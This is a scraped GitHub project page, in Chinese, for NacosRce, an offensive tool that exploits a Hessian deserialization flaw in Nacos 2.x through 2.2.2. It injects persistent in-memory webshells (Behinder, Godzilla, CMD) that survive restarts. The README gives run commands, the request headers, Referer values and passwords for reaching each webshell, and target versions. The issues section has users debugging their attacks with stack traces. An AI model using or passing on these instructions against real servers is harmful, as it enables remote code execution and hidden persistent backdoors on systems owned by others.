c0olw / nacosrce Goto Github PK

Nacos JRaft Hessian 反序列化 RCE 加载字节码注入内存马不出网利用

Java 100.00%

nacosrce's Introduction

Nacos Hessian 反序列化漏洞利用工具 v0.5

  _   _                     ____          
 | \ | | __ _  ___ ___  ___|  _ \ ___ ___ 
 |  \| |/ _` |/ __/ _ \/ __| |_) / __/ _ \
 | |\  | (_| | (_| (_) \__ \  _ < (_|  __/
 |_| \_|\__,_|\___\___/|___/_| \_\___\___|

Author: 刨洞安全 && 凉风

注意：工具仅供学习使用，请勿滥用，否则后果自负！

**食用方式 **

自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"
```
java -jar NacosRce.jar http://192.168.90.1:8848/nacos  7848 "whoami"
```

只注入内存马

   java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

内存马说明：
一、冰蝎内存马：
1、需要设置请求头x-client-data:rebeyond
2、设置Referer:https://www.google.com/
3、路径随意
4、密码rebeyond
二、哥斯拉内存马：
1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key

三、CMD内存马：
1、需要设置请求头x-client-data:cmd
2、设置Referer:https://www.google.com/
3、请求头cmd:要执行的命令
v0.5版本实现了：
1、不出网漏洞利用
2、可多次发起漏洞利用
3、同时注入冰蝎/哥斯拉/CMD内存马
4、内存马对nacos多版本进行了兼容

tips:
1、请用jdk1.8
2、适用于 Nacos 2.x <= 2.2.2
3、非集群的也能打哦
4、此内存马重启nacos依然存活

关于Windows
如用下面的方式执行，注入内存马时会生成临时文件 C:\Windows\Temp\nacos_data_temp 和 C:\Windows\Temp\nacos_data_temp.class 文件

java -jar NacosRce.jar http://192.168.90.1:8848  7848 "whoami" windows

如果没有在最后加 windows，临时文件会在 /tmp/nacos_data_temp /tmp/nacos_data_temp.class，所以权限足够的话，不指定windows也能打成功
windows 没打成功也许是因为没权限操作C盘或其他原因

关于编译
遇到依赖冲突无法编译的可以用以下方式

项目地址： https://github.com/c0olw/NacosRce

nacosrce's People

Contributors

Stargazers

Watchers

Forkers

sec00k j1ezds mssky9527 woaiqiukui nanaao ffadd kenyon-wong qlng test1213145 bbbfkl xwna hackerxj007 fj2m3iko 503744399 kasjhkjasd gaogaostone zwh1458 3as0n lakahuha qianniaoge ashupup 419066074 awsl404 ll160803 user3316 sec-fork d-rn msr00t dev-panda2022 cream-sec x-tfrk wdcew ch-fun xueliangzhang no-github ultramarine123 irony0egoist rootphantomer n1k0la-t daangx yikongge airskye anqisec functfan rassec mygit2014 mygit2014aaa magareally 5l1v3r1 fork-and-test jerrynotme data-gami be-gay-security-team lay0us1 auxiliarya jumpyyy pixel-revolve cuerz yeshuibo fa1c0n1 fasnow zpxlz madaharce ddawxaf go-bi wuha0926 werwolfz cobo666 changheluor007 hdys0vn yuzh0502 shellb0y liutufang999 gysf666 superneilcn cnhack3r savior-only fdlucifer ios1024 s0rryerr0r cmjlove1 gnusec zerone0x01

nacosrce's Issues

打包问题

本地打包之后不能payload貌似不能正常发送，idea直接运行可以正常触发payload
想问问作者是如何打包jar的

请问下，如何清理留下的内存马，多谢

太狠了，还做了持久化..

太狠了，还做了持久化..重启Nacos后还是会自动加载内存马

求解(手动解决)

师傅，在对自己的靶机测试时，发现自己打包的会注入失败，但是师傅提供的就可以成功，这是为什么呢？以下是截图，感谢师傅🙏

报错

请问师傅这种报错是哪里的问题

windows依然 bug，直接打没了

nacos 2.03 报错

*****未检测到内存马，自动注入开始***** SLF4J: Class path contains multiple SLF4J bindings. SLF4J: Found binding in [jar:file:/C:/Penetration/ExpolitTools/Nacos/NacosRce_jar/slf4j-simple-1.7.25.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: Found binding in [jar:file:/C:/Penetration/ExpolitTools/Nacos/NacosRce_jar/logback-classic-1.2.11.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation. SLF4J: Actual binding is of type [org.slf4j.impl.SimpleLoggerFactory] [main] INFO com.alipay.sofa.jraft.util.JRaftServiceLoader - SPI service [com.alipay.sofa.jraft.rpc.RaftRpcFactory - com.alipay.sofa.jraft.rpc.impl.GrpcRaftRpcFactory] loading. java.lang.IllegalStateException: failed to create a child event loop at io.grpc.netty.shaded.io.netty.util.concurrent.MultithreadEventExecutorGroup.<init>(MultithreadEventExecutorGroup.java:88) at io.grpc.netty.shaded.io.netty.util.concurrent.MultithreadEventExecutorGroup.<init>(MultithreadEventExecutorGroup.java:60) at io.grpc.netty.shaded.io.netty.util.concurrent.MultithreadEventExecutorGroup.<init>(MultithreadEventExecutorGroup.java:49) at io.grpc.netty.shaded.io.netty.channel.MultithreadEventLoopGroup.<init>(MultithreadEventLoopGroup.java:59) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoopGroup.<init>(NioEventLoopGroup.java:87) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoopGroup.<init>(NioEventLoopGroup.java:82) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoopGroup.<init>(NioEventLoopGroup.java:69) at io.grpc.netty.shaded.io.grpc.netty.Utils$DefaultEventLoopGroupResource.create(Utils.java:444) at io.grpc.netty.shaded.io.grpc.netty.Utils$DefaultEventLoopGroupResource.create(Utils.java:417) at io.grpc.internal.SharedResourceHolder.getInternal(SharedResourceHolder.java:104) at io.grpc.internal.SharedResourceHolder.get(SharedResourceHolder.java:74) at io.grpc.internal.SharedResourcePool.getObject(SharedResourcePool.java:35) at io.grpc.netty.shaded.io.grpc.netty.NettyChannelBuilder$NettyTransportFactory.<init>(NettyChannelBuilder.java:695) at io.grpc.netty.shaded.io.grpc.netty.NettyChannelBuilder.buildTransportFactory(NettyChannelBuilder.java:539) at io.grpc.netty.shaded.io.grpc.netty.NettyChannelBuilder$NettyChannelTransportFactoryBuilder.buildClientTransportFactory(NettyChannelBuilder.java:182) at io.grpc.internal.ManagedChannelImplBuilder.build(ManagedChannelImplBuilder.java:627) at io.grpc.internal.AbstractManagedChannelImplBuilder.build(AbstractManagedChannelImplBuilder.java:297) at com.alipay.sofa.jraft.rpc.impl.GrpcClient.newChannel(GrpcClient.java:210) at java.util.concurrent.ConcurrentHashMap.computeIfAbsent(Unknown Source) at com.alipay.sofa.jraft.rpc.impl.GrpcClient.getChannel(GrpcClient.java:199) at com.alipay.sofa.jraft.rpc.impl.GrpcClient.getCheckedChannel(GrpcClient.java:188) at com.alipay.sofa.jraft.rpc.impl.GrpcClient.invokeAsync(GrpcClient.java:145) at com.alipay.sofa.jraft.rpc.impl.GrpcClient.invokeSync(GrpcClient.java:118) at com.alipay.sofa.jraft.rpc.RpcClient.invokeSync(RpcClient.java:71) at com.alipay.sofa.jraft.rpc.impl.AbstractClientService.connect(AbstractClientService.java:149) at com.alipay.sofa.jraft.RouteTable.refreshLeader(RouteTable.java:244) at com.nacostools.rce.NacosRce.sendPayload(NacosRce.java:132) at com.nacostools.rce.NacosRce.main(NacosRce.java:76) Caused by: io.grpc.netty.shaded.io.netty.channel.ChannelException: failed to open a new selector at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoop.openSelector(NioEventLoop.java:178) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoop.<init>(NioEventLoop.java:145) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoopGroup.newChild(NioEventLoopGroup.java:183) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoopGroup.newChild(NioEventLoopGroup.java:38) at io.grpc.netty.shaded.io.netty.util.concurrent.MultithreadEventExecutorGroup.<init>(MultithreadEventExecutorGroup.java:84) ... 27 more Caused by: java.io.IOException: Unable to establish loopback connection at sun.nio.ch.PipeImpl$Initializer.run(Unknown Source) at sun.nio.ch.PipeImpl$Initializer.run(Unknown Source) at java.security.AccessController.doPrivileged(Native Method) at sun.nio.ch.PipeImpl.<init>(Unknown Source) at sun.nio.ch.SelectorProviderImpl.openPipe(Unknown Source) at java.nio.channels.Pipe.open(Unknown Source) at sun.nio.ch.WindowsSelectorImpl.<init>(Unknown Source) at sun.nio.ch.WindowsSelectorProvider.openSelector(Unknown Source) at io.grpc.netty.shaded.io.netty.channel.nio.NioEventLoop.openSelector(NioEventLoop.java:176) ... 31 more Caused by: java.net.ConnectException: Connection refused: connect at sun.nio.ch.Net.connect0(Native Method) at sun.nio.ch.Net.connect(Unknown Source) at sun.nio.ch.Net.connect(Unknown Source) at sun.nio.ch.SocketChannelImpl.connect(Unknown Source) at java.nio.channels.SocketChannel.open(Unknown Source) at sun.nio.ch.PipeImpl$Initializer$LoopbackConnector.run(Unknown Source) ... 40 more *****自动注入结束，注入失败*****

能不能整个直接命令执行

能不能整个直接命令执行，你这内存马报错打不成

嘀嘀嘀这个怎么判断是否攻击成功会有什么提示吗

报错了

java -jar NacosRce.jar http://192.168.10.81:8888/nacos 7888 "whoami"

09:09:41.306 [main] ERROR com.alipay.sofa.jraft.entity.PeerId - Parse peer from string failed: http://192.168.10.81:8888/nacos.
java.lang.NumberFormatException: For input string: "//192.168.10.81"
at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)
at java.lang.Integer.parseInt(Integer.java:569)
at java.lang.Integer.parseInt(Integer.java:615)
at com.alipay.sofa.jraft.entity.PeerId.parse(PeerId.java:204)
at com.alipay.sofa.jraft.conf.Configuration.parse(Configuration.java:300)
at com.nacostools.rce.NacosRce.sendPayload(NacosRce.java:120)
at com.nacostools.rce.NacosRce.main(NacosRce.java:87)
09:09:41.309 [main] ERROR com.alipay.sofa.jraft.conf.Configuration - Fail to parse peer http://192.168.10.81:8888/nacos in http://192.168.10.81:8888/nacos, ignore it.
09:09:41.428 [main] INFO com.alipay.sofa.jraft.util.JRaftServiceLoader - SPI service [com.alipay.sofa.jraft.rpc.RaftRpcFactory - com.alipay.sofa.jraft.rpc.impl.GrpcRaftRpcFactory] loading.
09:09:41.567 [main] ERROR com.alipay.sofa.jraft.entity.PeerId - Parse peer from string failed: http://192.168.10.81:8888/nacos.
java.lang.NumberFormatException: For input string: "//192.168.10.81"
at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)
at java.lang.Integer.parseInt(Integer.java:569)
at java.lang.Integer.parseInt(Integer.java:615)
at com.alipay.sofa.jraft.entity.PeerId.parse(PeerId.java:204)
at com.alipay.sofa.jraft.entity.PeerId.parsePeer(PeerId.java:93)
at com.nacostools.rce.NacosRce.sendPayload(NacosRce.java:125)
at com.nacostools.rce.NacosRce.main(NacosRce.java:87)
java.lang.NullPointerException